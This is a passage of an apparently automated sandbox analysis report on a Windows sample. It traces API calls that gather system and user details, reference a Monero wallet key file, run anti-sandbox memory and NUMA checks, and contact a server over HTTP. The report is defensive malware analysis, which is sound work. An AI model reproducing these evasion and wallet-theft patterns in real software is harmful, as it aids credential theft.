                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: a9057c3098630ecedd346f4c44fbb6fed2a8fd5a2c02c7205c7141d401476f15
                        • Instruction ID: 35b76d9dd390dbebcd5fcbe78ab37e0d6ef5c67a2f0b5e699939e0588f90074f
                        • Opcode Fuzzy Hash: a9057c3098630ecedd346f4c44fbb6fed2a8fd5a2c02c7205c7141d401476f15
                        • Instruction Fuzzy Hash: 84514BB4A00209EFDB14EFA0D964ABF77B6BF46704F104159E806AB290D774ED42DF62
                        Function 006A7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 6a7500-6a754a GetWindowsDirectoryA 1357 6a754c 1356->1357 1358 6a7553-6a75c7 GetVolumeInformationA call 6a8d00 * 3 1356->1358 1357->1358 1365 6a75d8-6a75df 1358->1365 1366 6a75fc-6a7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 6a75e1-6a75fa call 6a8d00 1365->1367 1369 6a7628-6a7658 wsprintfA call 6aa740 1366->1369 1370 6a7619-6a7626 call 6aa740 1366->1370 1367->1365 1377 6a767e-6a768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006A7542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006A757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A760A
                        • wsprintfA.USER32 ref: 006A7640
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$k
                        • API String ID: 1544550907-1212298063
                        • Opcode ID: 9571fdd7e68b0aa8cf305ef38eada6cea9a3710d75b0f96c33d305cb4ce36268
                        • Instruction ID: 177a12aed8075a267b66bc9cf05d56e328756d12afbc5f4915a56e98d314ffb8
                        • Opcode Fuzzy Hash: 9571fdd7e68b0aa8cf305ef38eada6cea9a3710d75b0f96c33d305cb4ce36268
                        • Instruction Fuzzy Hash: A84180B1D05248ABDB14EF94DC45BEEBBB9BF19700F100199F50A67280DB74AE44CFA5
                        Function 006A69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260C18), ref: 006A98A1
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260EB8), ref: 006A98BA
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260ED0), ref: 006A98D2
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260C30), ref: 006A98EA
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260C48), ref: 006A9903
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01268F70), ref: 006A991B
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01255480), ref: 006A9933
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,012553C0), ref: 006A994C
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260D80), ref: 006A9964
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260C60), ref: 006A997C
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260CA8), ref: 006A9995
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260D98), ref: 006A99AD
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01255400), ref: 006A99C5
                          • Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,01260CC0), ref: 006A99DE
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006911D0: ExitProcess.KERNEL32 ref: 00691211
                          • Part of subcall function 00691160: GetSystemInfo.KERNEL32(?), ref: 0069116A
                          • Part of subcall function 00691160: ExitProcess.KERNEL32 ref: 0069117E
                          • Part of subcall function 00691110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0069112B
                          • Part of subcall function 00691110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00691132
                          • Part of subcall function 00691110: ExitProcess.KERNEL32 ref: 00691143
                          • Part of subcall function 00691220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0069123E
                          • Part of subcall function 00691220: ExitProcess.KERNEL32 ref: 00691294
                          • Part of subcall function 006A6770: GetUserDefaultLangID.KERNEL32 ref: 006A6774
                          • Part of subcall function 00691190: ExitProcess.KERNEL32 ref: 006911C6
                          • Part of subcall function 006A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
                          • Part of subcall function 006A7850: RtlAllocateHeap.NTDLL(00000000), ref: 006A7887
                          • Part of subcall function 006A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F
                          • Part of subcall function 006A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7910
                          • Part of subcall function 006A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 006A7917
                          • Part of subcall function 006A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01268F90,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006A6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 006A6AF9
                        • Sleep.KERNEL32(00001770), ref: 006A6B04
                        • CloseHandle.KERNEL32(?,00000000,?,01268F90,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6B1A
                        • ExitProcess.KERNEL32 ref: 006A6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2931873225-0
                        • Opcode ID: a060417ba9fb41c388d2b95613762ecaac3c886c3926cdcdc6c8f1c75bc93285
                        • Instruction ID: d5c4f1bd82f38b69b91021cef487c75f9839e3a0866db010f564d4b6d5d3740c
                        • Opcode Fuzzy Hash: a060417ba9fb41c388d2b95613762ecaac3c886c3926cdcdc6c8f1c75bc93285
                        • Instruction Fuzzy Hash: 95313E70910209AADB84F7F0DC56BEE777AAF06300F20461EF212A6192DF745D05CFAA
                        Function 006A6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1436 6a6af3 1437 6a6b0a 1436->1437 1439 6a6aba-6a6ad7 call 6aaad0 OpenEventA 1437->1439 1440 6a6b0c-6a6b22 call 6a6920 call 6a5b10 CloseHandle ExitProcess 1437->1440 1445 6a6ad9-6a6af1 call 6aaad0 CreateEventA 1439->1445 1446 6a6af5-6a6b04 CloseHandle Sleep 1439->1446 1445->1440 1446->1437
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01268F90,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006A6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 006A6AF9
                        • Sleep.KERNEL32(00001770), ref: 006A6B04
                        • CloseHandle.KERNEL32(?,00000000,?,01268F90,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6B1A
                        • ExitProcess.KERNEL32 ref: 006A6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 72569cae9857f25cdb82039daed454409340b32064594c6f88b5550fbd516e43
                        • Instruction ID: 17288c1fb91ffb6f1e878413d2ae3e205b98e15a799610a71b85d5b5b67a2a0e
                        • Opcode Fuzzy Hash: 72569cae9857f25cdb82039daed454409340b32064594c6f88b5550fbd516e43
                        • Instruction Fuzzy Hash: 10F05E30A40209ABE740BBA0DD06BBE7BB5FB06701F24461ABA13A11C1DBB05D41DE6A
                        Function 006947B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 460ab39672556f5cc4162ae9091f9f217f9f0a517fedb33878d5e701c408407e
                        • Instruction ID: be36fa09bf8d8cae54f8d455a69cc187902a13a1cc613f49c6d9f81d6560e698
                        • Opcode Fuzzy Hash: 460ab39672556f5cc4162ae9091f9f217f9f0a517fedb33878d5e701c408407e
                        • Instruction Fuzzy Hash: D8215EB1D01209ABDF14EFA4EC45BDE7B75FB05320F108629F915A7291EB706A0ACF81
                        Function 006A51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 00696280: InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
                          • Part of subcall function 00696280: StrCmpCA.SHLWAPI(?,0126FA00), ref: 00696303
                          • Part of subcall function 00696280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
                          • Part of subcall function 00696280: HttpOpenRequestA.WININET(00000000,GET,?,0126F1C0,00000000,00000000,00400100,00000000), ref: 00696385
                          • Part of subcall function 00696280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
                          • Part of subcall function 00696280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 78afa1a1799b866f443be151d0a0f2eb9daf608e51dd2b115f1a8f196ec6e25d
                        • Instruction ID: 8a6a0cc220ce26a1bba29950caf4330d8072dce9de8b4fbaca82e409695d226c
                        • Opcode Fuzzy Hash: 78afa1a1799b866f443be151d0a0f2eb9daf608e51dd2b115f1a8f196ec6e25d
                        • Instruction Fuzzy Hash: D5112E70900108ABCB94FFA4DD52AED737AAF52340F90415DF90B5A592EF34AF06CE95
                        Function 00691220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1493 691220-691247 call 6a89b0 GlobalMemoryStatusEx 1496 691249-691271 call 6ada00 * 2 1493->1496 1497 691273-69127a 1493->1497 1499 691281-691285 1496->1499 1497->1499 1501 69129a-69129d 1499->1501 1502 691287 1499->1502 1504 691289-691290 1502->1504 1505 691292-691294 ExitProcess 1502->1505 1504->1501 1504->1505
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0069123E
                        • ExitProcess.KERNEL32 ref: 00691294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 803317263-2766056989
                        • Opcode ID: ed07dd3825dd3ffa0b7eab510967892f2fc7b03bfc75e8c3fef102f9afea2d1f
                        • Instruction ID: b120ba5b8a706af356c51775edc29c15c781579392118eff118098a875adc99c
                        • Opcode Fuzzy Hash: ed07dd3825dd3ffa0b7eab510967892f2fc7b03bfc75e8c3fef102f9afea2d1f
                        • Instruction Fuzzy Hash: 930162B0D40308BBDF10EBD4CC49B9EBB7DAB05701F308149E705BA6C0D7745A818B59
                        Function 006A78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A7917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: f704199ad64deb1fa1811bab2605ace5f856bfbab6fc58d9ab2895bd6cb7f30f
                        • Instruction ID: 8007cfe01c93950f1203c5efa1ddae98d6dbb91b2b70e65d3cc28569b862a39e
                        • Opcode Fuzzy Hash: f704199ad64deb1fa1811bab2605ace5f856bfbab6fc58d9ab2895bd6cb7f30f
                        • Instruction Fuzzy Hash: 6C0186B1904204EFC714EF94DD45BABFBB8F705B11F10422AF945E3280C37559008BA1
                        Function 00691110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0069112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00691132
                        • ExitProcess.KERNEL32 ref: 00691143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 50d153cdeb55300953ed4378dbc5dc52c087853eb0af92e204e231dfb8ef6465
                        • Instruction ID: dca99fcc5597cb549ee226a7c0b871d762300e1592bc26c2c6d4db394eebddeb
                        • Opcode Fuzzy Hash: 50d153cdeb55300953ed4378dbc5dc52c087853eb0af92e204e231dfb8ef6465
                        • Instruction Fuzzy Hash: 82E0867094630CFFEB146BA19C0EB08777CBB04B01F300155FB087A5C0CAB526009699
                        Function 006910A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006910B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006910F7
